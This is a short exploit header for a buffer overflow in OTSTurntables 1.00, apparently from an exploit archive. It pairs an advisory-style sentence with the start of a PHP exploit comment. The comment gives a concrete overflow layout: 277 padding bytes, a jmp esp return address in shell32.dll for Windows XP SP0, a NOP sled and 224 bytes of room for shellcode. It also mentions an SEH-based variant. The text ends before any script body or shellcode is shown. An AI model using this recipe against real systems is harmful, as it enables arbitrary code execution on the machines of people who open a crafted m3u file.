Buffer overflow in Ots Labs OTSTurntables 1.00 allows user-assisted remote malicious users to execute arbitrary code via a long file path in an m3u file.
<?php
/*
OTSTurntables 100 Buffer OverFlow 0days
224 bytes available for shellcode,, you can replace it with you favourite one,,
0x77394540 jmp esp in shell32dll Winxp sp0
exploit : [A x 277] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224]
&& if you want to exploit this vul with SEH ,, take some infos :p
[ A x 277 ] + [EIP] ...